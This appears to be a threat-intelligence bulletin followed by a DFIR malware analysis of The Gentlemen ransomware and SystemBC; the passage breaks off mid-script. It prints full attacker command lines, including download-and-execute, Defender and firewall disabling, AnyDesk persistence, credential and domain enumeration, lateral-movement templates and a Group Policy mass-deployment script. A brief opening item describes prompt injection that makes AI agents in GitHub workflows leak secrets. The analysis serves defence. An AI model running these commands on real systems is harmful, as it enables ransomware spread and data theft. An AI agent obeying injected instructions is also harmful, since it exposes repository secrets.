  • Researchers demonstrated a prompt injection technique that hijacks AI agents used in GitHub workflows from major vendors. Malicious instructions hidden in pull request titles or comments can make the agents run commands and expose repository secrets, including access tokens and API keys, during automated development tasks.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Apache ActiveMQ vulnerability CVE-2026-34197, a high-severity code injection flaw that allows remote code execution. The vulnerability carries a CVSS score of 8.8 and has been addressed by Apache in versions 5.19.4 or 6.2.3.

Check Point IPS provides protection against this threat (Apache ActiveMQ Code Injection (CVE-2026-34197))

  • Splunk has released fixes for CVE-2026-20204, a high-severity vulnerability in Splunk Enterprise and Cloud Platform. The flaw can let a low-privileged user upload a malicious file to a temporary directory and achieve remote code execution, while two additional medium-severity issues were also addressed.
  • As part of its Patch Tuesday, Microsoft has patched CVE-2026-33825, one of three actively-exploited Microsoft Defender zero-days dubbed BlueHammer, RedSun, and UnDefend that were revealed by a security researcher. The vulnerabilities allow local privilege escalation as well as denial of service, and researchers said exploitation began in April after the vulnerabilities were revealed.
  • CISA has flagged the vulnerability CVE-2025-60710, a Windows Task Host privilege escalation flaw affecting Windows 11 and Windows Server 2025, as being actively exploited in attacks. The vulnerability allows a local attacker to gain SYSTEM privileges on a compromised device.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have documented 2026 Q1 brand impersonation phishing focused on Microsoft, Apple, Google, and Amazon, which accounted for nearly half of observed attempts. The research shows attackers using lookalike subdomains, QR-based WhatsApp lures, and fake Adobe installers to steal credentials and compromise devices.
  • Researchers uncovered ZionSiphon, malware designed to target industrial control environments at water treatment and desalination facilities in Israel. The report says the code is configured for operational technology systems and reflects continued attacker interest in critical infrastructure, especially utilities with exposed or weakly defended networks.
  • Researchers identified more than 1,250 active command and control servers distributed across 165 Russian hosting providers between January and April 2026. The infrastructure supported malware campaigns involving traffic redirection systems, IoT botnets including Hajime, Mozi, and Mirai, and repurposed tools such as Cobalt Strike.
  • Researchers observed a fake “Ledger Live” app on Apple’s App Store that stole more than $9.5 million from over 50 cryptocurrency users within a week. The app harvested wallet credentials, drained funds across Bitcoin, Ethereum, Solana, Tron and XRP, and routed proceeds through KuCoin deposit addresses and the AudiA6 mixer, complicating recovery.

The post 20th April – Threat Intelligence Report appeared first on Check Point Research.

DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy

Key Points

  • The Gentlemen ransomware‑as‑a‑service (RaaS) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks (240) occurring in the first months of 2026.
  • The service provides a broad locker portfolio implemented in Go for WindowsLinuxNAS, and BSD, plus an additional locker written in C for ESXi, enabling coverage of the multiple platforms commonly found in corporate environments.
  • During an incident response engagement, an affiliate associated with The Gentlemen attempted to deploy SystemBC, a proxy malware frequently leveraged in human‑operated ransomware operations for covert tunneling and payload delivery.
  • Check Point Research observed victim telemetry from the relevant SystemBC command‑and‑control server, revealing a botnet of over 1,570 victims, with the infection profile strongly suggesting a focus on corporate and organizational environments rather than opportunistic consumer targeting.


The Gentlemen RaaS

The Gentlemen ransomware‑as‑a‑service (RaaS) operation is a relatively new group that emerged around mid‑2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates.

Figure 1 — The Gentlemen post on underground forums.

The RaaS provides affiliates with multi‑OS lockers for Windows, Linux, NAS, BSD implemented in Go, and an additional locker for ESXi implemented in C. The group also grants verified partners access to EDR‑killing tools and its own multi‑chain pivot infrastructure (server and client components).

The group maintains an onion site where it publishes data stolen from victims who refuse to pay. Negotiations, however, are not conducted through this leak portal but via the individual affiliate’s Tox ID. Tox is a free, decentralized, peer‑to‑peer (P2P) instant messaging protocol that provides end‑to‑end encrypted voice, video, and text communication.

The group also appears to maintain a Twitter/X account, which is referenced in the ransomware note. Through this account, the operators publicly post about victims, likely to increase pressure on them to pay.

Figure 2 — The Gentlemen RaaS X/Twitter account.

To date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. This growth in activity suggests that The Gentlemen RaaS program has managed to attract a significant number of affiliates over the last few months.


SystemBC Infections

During an incident response case, an affiliate of The Gentlemen Ransomware‑as‑a‑Service (RaaS) deployed SystemBC, a proxy malware, on the compromised host. SystemBC establishes SOCKS5 network tunnels within the victim’s environment and connects to its C&C server using a custom RC4‑encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or injected directly into memory.

The specific Command and Control server that was used for the communication had infected a large number of victims across the globe. It is likely that the majority of those victims are companies and organizations, given that SystemBC is typically deployed as part of human‑operated intrusion workflows rather than massive targeting.

Figure 3 — SystemBC global accesses.

There are over 1,570 victims, with the majority located in the United States, followed by the United Kingdom and Germany.

Figure 4 — Top 15 Infected countries.

Whether SystemBC is directly integrated into The Gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access remains unclear. At this time, Check Point Research has no evidence to determine the exact nature of this relationship.

Figure 5 — SystemBC infections panel.


DFIR Report – Timeline

Figure 6 – A high-level timeline of the attack

Initial Access and Establishment of Domain Control

The precise initial access vector could not be conclusively determined. The earliest stage of adversary activity that can be established with confidence is the attacker’s presence on a Domain Controller with Domain Admin–level privileges. From that position, the attacker appears to have performed systematic credential validation and host accessibility testing across the environment, as reflected in an initial pattern of failed network logons followed by successful authentications originating from the Domain Controller. This sequence is consistent with a controlled effort to verify privileged access and identify viable systems before expanding operations more broadly.

Remote Execution and Early Discovery

Using this privileged position, the attacker deployed Cobalt Strike payloads to remote systems by writing executables to administrative shares such as \\\\[REDACTED_HOSTNAME]\\ADMIN$\\<random_7_char>.exe and executing them via RPC. The first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. Early post-compromise actions included reconnaissance commands such as cmd.exe /C systeminfo, cmd.exe /C whoami, and enumeration commands like cmd.exe /C dir c:\\users. The attacker also accessed internal documentation via cmd.exe /C type \\\\[REDACTED_HOSTNAME]\\d$\\...\\公司主機紀錄.txt, indicating use of environment-specific knowledge in addition to automated discovery. Expansion to other systems followed quickly, with repeated execution artifacts such as regsvr32.exe across multiple hosts confirming centrally driven activity.

Command-and-Control and Payload Staging

As execution expanded, the attacker attempted to establish additional command-and-control capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /C tasklist | findstr /i socks. This tool is commonly used to create SOCKS-based proxy channels for covert communication and internal pivoting. In this instance, however, the activity was blocked by endpoint protection. Shortly thereafter, a remotely executed payload (<random_7_char>.exe) spawned c:\\windows\\system32\\rundll32.exe, which established outbound communication to 91.107.247[.]163 Cobalt Strike C&C over ports 443 and later 80, indicating successful external command-and-control connectivity through alternative infrastructure.

At the same stage, PowerShell was executed from a scheduled task context using:

powershell.exe -ExecutionPolicy Bypass -command (new-object net.webclient).downloadfile('http://[REDACTED_DOMAIN_CONTROLLER]:8080/grand.exe', 'c:\\programdata\\r.exe'); c:\\programdata\\r.exe --password VvO8EtUh --spread [REDACTED_DOMAIN]\\[REDACTED_USER]:[REDACTED_PASSWORD]

This command downloaded grand.exe (the ransomware encryptor) from an internal staging server (DC) and executed it as c:\\programdata\\r.exe. The arguments --password VvO8EtUh and --spread [REDACTED_DOMAIN]\\[REDACTED_USER]:[REDACTED_PASSWORD] indicate both controlled execution and built-in propagation capability, marking a transition from initial access to coordinated malware deployment.

Defense Evasion, Propagation, and Persistence

Following execution of the staged payload, the attacker attempted to weaken host defenses using:

powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force

This disabled Windows Defender real-time monitoring. The same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c:\\programdata\\r.exe, c:\\programdata\\g.exe, and c:\\programdata\\o.exe. This demonstrates rapid internal propagation via a shared malware component, supported by both domain-level access and the built-in spreading mechanism described earlier.

In parallel, the attacker performed environmental checks using commands such as:

cmd.exe /C wmic product where Name like '%kaspe%' get Name, IdentifyingNumber

Later, repeatedly executed across multiple hosts:

cmd.exe /C gpupdate /force

These attempts suggest the threat actor tried to influence or validate policy state during propagation. Remote Desktop was then enabled through commands such as:

cmd.exe /C reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Later, the attacker installed and configured AnyDesk using:

cmd.exe /C anydesk.exe --install C:\\Program Files (x86)\\AnyDesk\\anydesk.exe --start-with-win
cmd.exe /C echo Camry@12345 | C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe --set-password
cmd.exe /C anydesk.exe --start
cmd.exe /C anydesk.exe --get-id

This established a persistent remote access channel with a predefined password (Camry@12345), adding a secondary access mechanism after the SystemBC attempt was blocked.

Credential Access and Continued Discovery

Compromised hosts were also used for credential harvesting. Mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain accounts and stored credentials from Credential Manager. This confirms that credential access occurred alongside lateral movement and malware deployment.

At the same time, the attacker continued discovery operations using commands such as:

cmd.exe /C query session
cmd.exe /C nltest /domain_trusts
cmd.exe /C nltest /dclist
cmd.exe /C net group "Domain Admins" /domain
cmd.exe /C net group "Enterprise Admins" /domain

These commands indicate enumeration of active sessions, domain trust relationships, domain controllers, and privileged groups, reflecting a shift toward understanding and potentially controlling the broader domain structure.

Consolidated View of the Intrusion

Taken together, the attack progressed from suspected perimeter access to domain-level control, followed by credential validation, remote payload execution via ADMIN$ shares, and rapid expansion across endpoints. This was accompanied by attempted and successful command-and-control establishment using infrastructure such as 45.86.230[.]112 and 91.107.247[.]163, staged malware delivery from the internal DC, and widespread propagation of a shared payload under multiple filenames. Defensive measures were actively suppressed, and multiple persistence and exfiltration mechanisms were introduced, including RDP and AnyDesk.

The failed deployment of SystemBC and the subsequent reliance on alternative channels demonstrate that the attacker adapted their approach when blocked. Overall, the activity reflects coordinated, centrally controlled execution with layered access mechanisms, resulting in broad, durable control over the environment.

Impact

The intrusion culminated in the deployment of The Gentlemen RaaS payload by an affiliate, using Group Policy as the distribution mechanism. A GPO‑based deployment was configured so that the ransomware binary was executed on domain‑joined systems during policy refresh, resulting in a rapid, near‑simultaneous encryption event across the environment.


The Gentlemen GO Ransomware

The Gentlemen ransomware is developed in the Go programming language. It appears to be under active development, with new features and capabilities being continuously added over time.

Command Line Arguments

The Gentlemen ransomware exposes a wide range of command‑line options that provide numerous features to its operators. While most flags are optional, the only mandatory argument required to start the encryption process is --password, which appears to be unique per build/infection.

Usage: %s --password PASS [--path DIR1,DIR2,...] [--T MIN] [--silent] [--wipe] [--keep] [--full/system/shares] [--gpo/spread] [--fast/superfast/ultrafast] 

  Main Flags 
  --password PASS    Access password (required)
  --path DIRS        Comma-separated list of target directories/disks (optional)
  --T MIN            Delay before start, in minutes (optional)

  Mode Flags (cant be mixed) 
  --system           Run as SYSTEM: encrypt only local drives (optional)
  --shares           Encrypt only mapped network drives and available UNC shares in session context (optional)
  --full             Two-phase: --system + --shares. Best practice. (optional)

  Additional Flags 
  --spread CREDS     Lateral movement: "domain/user:pass" with creds, or "" for current session
  --gpo              Deploy via Group Policy to all domain computers (run on DC)
  --silent           Silent mode: do NOT rename and modify time of files after encryption, no wallpaper(optional)
  --keep             Do not selfdelete after encryption (optional)
  --wipe             Wipe free space after encryption (optional)

  Speed Flags (cant be mixed) 
  --fast             9 percent crypt. (optional)
  --superfast        3 percent crypt. (optional)
  --ultrafast        1 percent crypt. (optional)

    Example 1: --password QWERTY --path "C:\\,D:\\,\\\\nas\\share" --T 15 --silent
    Example 2: --password QWERTY --system --fast
    Example 3: --password QWERTY --shares --T 10
    Example 4: --password QWERTY --full --ultrafast
    Example 5: --password QWERTY --full --spread "domain\\admin:P@ss"  # With credentials
    Example 6: --password QWERTY --T 10 --keep --spread ""                     # Current session
    Example 7: --password QWERTY --gpo --full --fast

[+]

The minimum required command‑line for The Gentlemen ransomware execution is:

$process_name --password $pass

The password is plaintext hardcoded in the binary validates it with the password provided in the required argument.

Figure 7 — Argument – Hardcoded Password comparison.

Processes & Services Termination

To terminate running processes, the malware repeatedly executes the following command in a loop for each targeted process:

  • taskkill /IM <process>.exe /F
CategoryProcesses targeted
VMware / Hyper-Vvmms, vmwp, vmcompute, vmacthlp, vmtoolsd, vmware, vmware-tray, vmware-vmx, vmwareuser
SQL Serversqlservr, sql, sqlbrowser, sqlwriter, SQLAGENT, sqlceip, sqbcoreservice, fdlauncher, fdhost, isqlplussvc, ReportingServicesService, Microsoft.SqlServer.Management, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost, DBeaver, Ssms, dbeng50, dbsnmp
MySQL / PostgreSQL / Oraclemysqld, oracle, postmaster, postgres, psql, pgAdmin3, pgAdmin4, ocssd, ocomm, ocautoupds
Backup & RecoveryDatto, cbService, cbVSCService11, cbInterface, MSP360, Macrium, Acronis, Carbonite, CrashPlan, Unitrends, StorageCraft, raw_agent_svc, vsnapvss, ShadowProtectSvc, Iperius, IperiusService, avagent, avscc, CagService
VeeamVeeamNFSSvc, VeeamTransportSvc, VeeamDeploymentSvc, Veeam.EndPoint.Service
CommvaultCVMountd, cvd, cvfwd, CVODS
SAPSAP, saphostexec, saposco, sapstartsrv, agntsvc
Veritas / Symantec BEbedbh, vxmon, benetns, bengien, pvlsvr, beserver
Office / Productivityexcel, infopath, msaccess, mspub, onenote, outlook, powerpnt, visio, winword, wordpad, notepad
Email Clientsthebat, thunderbird, tbirdconfig
Web / App Serversw3wp, encsvc, xfssvccon
Remote AccessTeamViewer_Service, TeamViewer, tv_w32, tv_x64
QuickBooksQBIDPService, QBDBMgrN, QBCFMonitorService
Desktop / Misc Servicesmydesktopqos, mydesktopservice, mvdesktopservice, synctime, EnterpriseClient, DellSystemDetect, Docker Desktop
Otherfirefox, steam

For service termination, the ransomware relies on two distinct commands:

  1. sc config <service> start=disabled, sends a stop signal to the service right now, killing it immediately if it’s currently running.
  2. sc stop <service>, sends a stop signal to the service right now, killing it immediately if it’s currently running.
CategoryServices targeted
Backup & Recoveryvmms, veeam, backup, vss, YooBackup, DattoBackup, MSP360Service, Macrium*, ShadowProtectSvc, PDVFSService, AcronisCyberProtect, AcronisAgent, AcrSch2Svc, VSNAPVSS, storflt, stc_raw_agent, VeeamNFSSvc, VeeamDeploymentService, VeeamTransportSvc
Veritas / Backup ExecBackupExec*, BackupExecVSSProvider, BackupExecAgentAccelerator, BackupExecAgentBrowser, BackupExecDiveciMediaService, BackupExecJobEngine, BackupExecManagementService, BackupExecRPCService
SQL / DatabasesSql, sql, MSSQL*, MSSQLSERVER, MSSQL, MSSQL$SQLEXPRESS, SQLSERVERAGENT, SQLWriter, SQLAgent$SQLEXPRESS, MsDtsServer150, SSISScaleOutWorker150, SSSScaleOutMaster, SSSScaleOutWorker, SSASTELEMETRY, SQL Server Distributed Replay Client, SQL Server Distributed Replay Controller, MySQL, MariaDB, postgresql, OracleServiceORCL, (.)sql(.)
VMwareVMware, VMwareTools, VMwareHostd, VMAuthdService, VMUSBArbService
Exchange / SharePointmsexchange, MSExchange, MSExchange\$, WSBExchange, SPAdminV4
Security / AVSymantec*, sophos, DefWatch, RTVscan, SavRoam, ccSetMgr, ccEvtMgr, MVarmor, MVarmor64, zhudongfangyu
Commvault (Gx)*GxBlr, GxVss, GxClMgrS, GxCVD, GxClMgr, GXMMM, GxVsshWProv, GxFWD
SAPSAP, SAP$, SAPD$, SAPService, SAPHostControl, SAPHostExec
VeritasVeritas*
QuickBooksQBCFMonitorService, QBDBMgrN, QBIDPService
Other / Miscmepocs, memtas, docker, CAARCUpdateSvc, CASAD2DWebSvc, YooIT, svc$

Persistence

During execution, the ransomware attempts to establish persistence using multiple mechanisms. It first attempts to create a scheduled task, initially without validating the current process privileges:

  • schtasks /Delete /TN UpdateSystem /F
  • schtasks /Create /SC ONSTART /TN UpdateSystem /TR "<exe> <args>" /RU SYSTEM

In a second attempt, the ransomware creates the same scheduled task in the user context by reissuing the commands without the /RU SYSTEM.

  • schtasks /Delete /TN UpdateUser /F
  • schtasks /Create /SC ONSTART /TN UpdateUser /TR "<exe> <args>"

The second local persistence method relies on a Run registry key. As with scheduled tasks, the malware attempts to configure this both for the system (HKLM) and for the current user (HKCU):

  • reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v GupdateU /t REG_SZ /d "<exe>" /f

When the --spread argument is enabled, the ransomware also attempts to maintain remote persistence on each reachable host. For each target, it sets up two persistence mechanisms:

  • Scheduled tasks–based persistence
  • Service–based persistence

Both mechanisms attempt to execute the ransomware from different locations on the remote machine or over a share.

# Scheduled Tasks
schtasks /Create /S <target> /TN DefS /TR "<exe>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN DefS

schtasks /Create /S <target> /TN UpdateGS /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN UpdateGS

schtasks /Create /S <target> /TN UpdateGS2 /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN UpdateGS2

# Services
sc \\\\<target> create DefSvc binpath= "<exe>"
sc \\\\<target> start DefSvc

sc \\\\<target> create UpdateSvc binpath= "\\\\<host>\\share$\\<exe> <creds>"
sc \\\\<target> start UpdateSvc

sc \\\\<target> create UpdateSvc2 binpath= "C:\\Temp\\<exe> <creds>"
sc \\\\<target> start UpdateSvc2

*Full command lines for the --spread argument are provided further below.

Antivirus Evasion

The ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire C:\\ drive from scanning and monitoring:

  • powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force, disables Defender’s real-time protection entirely, the background scanning that monitors files, downloads, and processes as they’re accessed. With this off, malware can run without being intercepted.
  • powershell -Command Add-MpPreference -ExclusionProcess <ransomware_exe> -Force, adds a specific executable to Defender’s process exclusion list. Defender will completely ignore any file activity triggered by that process, even if it’s doing something malicious.
  • powershell -Command Add-MpPreference -ExclusionPath C:\\ -Force, adds the entire C: drive to Defender’s path exclusion list. This tells Defender to skip scanning anything on the drive, every file, folder, and executable.

During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down the firewall, re-enables SMB1, and loosens LSA anonymous access controls, all before deploying and executing the ransomware binary on that host.

Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath 'C:\\'
Add-MpPreference -ExclusionPath 'C:\\Temp'
Add-MpPreference -ExclusionPath '\\\\<host>\\share$'
Add-MpPreference -ExclusionProcess '<exe>'
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
reg add ...\\Lsa /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
reg add ...\\Lsa /v RestrictAnonymous /t REG_DWORD /d 0 /f

Windows Firewall

The ransomware tries to disable the firewall to allow unrestricted outbound and inbound traffic. This enables lateral movement tools (PsExec, WMI, SMB) to reach remote hosts without firewall rules blocking them, and allows exfiltration channels to operate freely. Bellow the executed commands deactivating the firewall:

  • netsh advfirewall set allprofiles state off
  • powershell -Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
  • sc stop mpssvc
  • sc config mpssvc start=disabled

Lateral movement, --spread argument

The --spread argument is disabled by default and is assigned the value "DISABLED". The lateral movement phase is only activated when the operator explicitly supplies --spread "domain\\user:password", providing credentials harvested from the environment.

These credentials are then reused across all lateral movement operations: PsExec receives them via the -u and -p parameters, WMI uses them for remote authentication, and remote scheduled task and service creation, authenticating with them against each target host.

Once --spread is enabled, the ransomware enumerates all domain computers via Active Directory, pings each discovered host to confirm reachability, and, for every host that responds, executes the full lateral movement sequence: copying the binary, pushing the Defender‑disabling script, and deploying it through six parallel execution channels across PsExec, WMI, scheduled tasks, and services.

 --- SETUP (executed once before the per-target loop) ---

 cmd /C copy "<exe>" "C:\\Temp\\" /Y
 cmd /C xcopy "<exe>" "\\\\<host>\\C$\\Temp\\" /Y /I /C /H /R /K
 cmd /C net share share$=C:\\Temp /GRANT:Everyone,FULL
 cmd /C icacls C:\\Temp /grant "ANONYMOUS LOGON":F
 cmd /C reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
        /v NullSessionShares /t REG_MULTI_SZ /d share$ /f
 cmd /C reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
        /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f

 --- PER TARGET (loop over all reachable hosts) ---

 -- File copy to target --
 cmd /C copy "<exe>" "C:\\Temp\\" /Y
 cmd /C xcopy "<exe>" "\\\\<target>\\C$\\Temp\\" /Y /I /C /H /R /K

 -- PsExec: disable Defender on target (with credentials) --
 psexec \\\\<target> -accepteula -d -s -u <domain\\user> -p <pass>
     cmd /c <DEFENDER_SCRIPT_A>

 -- PsExec: disable Defender on target (no credentials) --
 psexec \\\\<target> -accepteula -d -s
     cmd /c <DEFENDER_SCRIPT_A>

 -- PsExec: run via local Temp (with credentials) --
 psexec \\\\<target> -accepteula -d -h -u <domain\\user> -p <pass>
     C:\\Temp\\<exe> <creds>

 -- PsExec: run via local Temp (no credentials) --
 psexec \\\\<target> -accepteula -d -h
     C:\\Temp\\<exe>

 -- WMI: run Defender disable script --
 wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>"

 -- WMI: run via share path --
 wmic /node:<target> process call create
    "\\\\<host>\\share$\\<exe> <creds>"

 -- WMI: run via local Temp --
 wmic /node:<target> process call create
    "C:\\Temp\\<exe> <creds>"

 -- Remote schtask: DefU (no SYSTEM) --
 schtasks /Create /S <target> /TN DefU
      /TR "<exe>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN DefU

 -- Remote schtask: UpdateGU (share path) --
 schtasks /Create /S <target> /TN UpdateGU
      /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN UpdateGU

 -- Remote schtask: UpdateGU2 (local Temp) --
 schtasks /Create /S <target> /TN UpdateGU2
      /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN UpdateGU2

 -- Remote schtask: DefS (SYSTEM, direct exe) --
 schtasks /Create /S <target> /TN DefS
      /TR "<exe>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN DefS

 -- Remote schtask: UpdateGS (SYSTEM, share path) --
 schtasks /Create /S <target> /TN UpdateGS
      /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN UpdateGS

 -- Remote schtask: UpdateGS2 (SYSTEM, local Temp) --
 schtasks /Create /S <target> /TN UpdateGS2
      /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN UpdateGS2

 -- Remote service: DefSvc (direct exe) --
 sc \\\\<target> create DefSvc  binpath= "<exe>"
 sc \\\\<target> start  DefSvc

 -- Remote service: UpdateSvc (share path) --
 sc \\\\<target> create UpdateSvc  binpath= "\\\\<host>\\share$\\<exe> <creds>"
 sc \\\\<target> start  UpdateSvc

 -- Remote service: UpdateSvc2 (local Temp) --
 sc \\\\<target> create UpdateSvc2 binpath= "C:\\Temp\\<exe> <creds>"
 sc \\\\<target> start  UpdateSvc2

 -- Remote PowerShell: SCRIPT_B — full Defender/firewall/SMB1/LSA/shares (no creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Set-MpPreference -DisableRealtimeMonitoring $true;
    Add-MpPreference -ExclusionPath 'C:\\';
    Add-MpPreference -ExclusionPath 'C:\\Temp';
    Add-MpPreference -ExclusionPath '\\\\<host>\\share$';
    Add-MpPreference -ExclusionProcess '<exe>';
    Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
    Get-PSDrive -PSProvider FileSystem |
     Where-Object {$_.Name -match '^[A-Z]$'} |
     ForEach-Object {
      $d = $_.Name;
      net share ($d+'$')=($d+':\\') /GRANT:Everyone,FULL 2>$null;
      icacls ($d+':\\') /grant Everyone:F /T /C /Q 2>$null
     };
    Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart 2>$null;
    reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
      /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f 2>$null;
    reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
      /v RestrictAnonymous /t REG_DWORD /d 0 /f 2>$null"

 -- Remote PowerShell: SCRIPT_C — WinRM Defender disable + process exclusion (with creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Set-MpPreference -DisableRealtimeMonitoring $true;
      Add-MpPreference -ExclusionPath 'C:\\';
      Add-MpPreference -ExclusionProcess '<exe>'
    }"

 -- Remote PowerShell: SCRIPT_D — WinRM start process via share (no creds, 67-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock { Start-Process '<exe>' }"

 -- Remote PowerShell: SCRIPT_E — WinRM start process via share with args (with creds, 96-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Start-Process -FilePath '<\\\\<host>\\share$\\<exe>>' -ArgumentList '<creds>'
    }"

 -- Remote PowerShell: SCRIPT_F — WinRM start process via local Temp (no creds, 63-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock { Start-Process 'C:\\Temp\\<exe>' }"

 -- Remote PowerShell: SCRIPT_G — WinRM start process via local Temp with args (with creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Start-Process -FilePath 'C:\\Temp\\<exe>' -ArgumentList '<creds>'
    }"
    

 SCRIPT_A (Defender disable — used inline by PsExec and WMI calls)
 ---------------------------------------------------------------
 powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true;
   Add-MpPreference -ExclusionPath 'C:\\';
   Add-MpPreference -ExclusionPath 'C:\\Temp';
   Add-MpPreference -ExclusionPath '\\\\<host>\\share$';
   Add-MpPreference -ExclusionProcess '<exe>';
   Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
   Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart 2>$null;
   reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
     /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f 2>$null;
   reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
     /v RestrictAnonymous /t REG_DWORD /d 0 /f 2>$null"

Deploy via Group Policy

The --gpo flag enables the most powerful and far-reaching deployment method in the entire binary, reserved specifically for operators who have already compromised a Domain Controller. It is designed to weaponize Active Directory’s own Group Policy infrastructure to detonate the ransomware simultaneously on every computer in the domain. When --gpo is enabled, the following PowerShell script is executed:

  Write-Host "[+] Installing required modules..."
  try { Import-Module ServerManager -ErrorAction Stop } catch {}
  try { Add-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
  try { Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
  try { Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
        -ErrorAction SilentlyContinue } catch {}
  try { Add-WindowsCapability -Online -Name "Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0"
        -ErrorAction SilentlyContinue } catch {}
  try { DISM.exe /Online /Add-Capability
        /CapabilityName:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 2>$null } catch {}
  try { DISM.exe /Online /Add-Capability
        /CapabilityName:Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 2>$null } catch {}
  Import-Module ActiveDirectory -ErrorAction SilentlyContinue
  Import-Module GroupPolicy -ErrorAction SilentlyContinue

  Write-Host "[+] Getting domain info..."
  try {
      $Domain   = (Get-ADDomain).DNSRoot
      $DomainDN = (Get-ADDomain).DistinguishedName
      Write-Host "[+] Domain from AD: $Domain"
  } catch {
      try {
          $Domain   = (Get-WmiObject Win32_ComputerSystem).Domain
          $DomainDN = "DC=" + ($Domain -replace '\\.',',DC=')
          Write-Host "[+] Domain from WMI: $Domain"
      } catch {
          $Domain   = $env:USERDNSDOMAIN
          $DomainDN = "DC=" + ($Domain -replace '\\.',',DC=')
          Write-Host "[+] Domain from env: $Domain"
      }
  }

  Write-Host "[+] Copying locker to NETLOGON..."
  $ExePath = "\\\\$Domain\\NETLOGON\\<exe>"
  Copy-Item -Path "<exe>" -Destination $ExePath -Force -ErrorAction SilentlyContinue

  Write-Host "[+] Creating GPO..."
  $guid = [guid]::NewGuid().ToString().ToUpper()
  New-GPO -Name "<gpo_name>" -Comment "System Update" -ErrorAction SilentlyContinue | Out-Null
  New-GPLink -Name "<gpo_name>" -Target $DomainDN -ErrorAction SilentlyContinue | Out-Null

  $GpoScheduledPath = "\\\\$Domain\\SYSVOL\\$Domain\\Policies\\{$guid}\\Machine\\Preferences\\ScheduledTasks"
  New-Item -ItemType Directory -Path $GpoScheduledPath -Force | Out-Null

  $TaskXmlPath = "$env:TEMP\\ScheduledTasks.xml"
  $TaskName    = "SystemUpdate"

  @"
  <ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
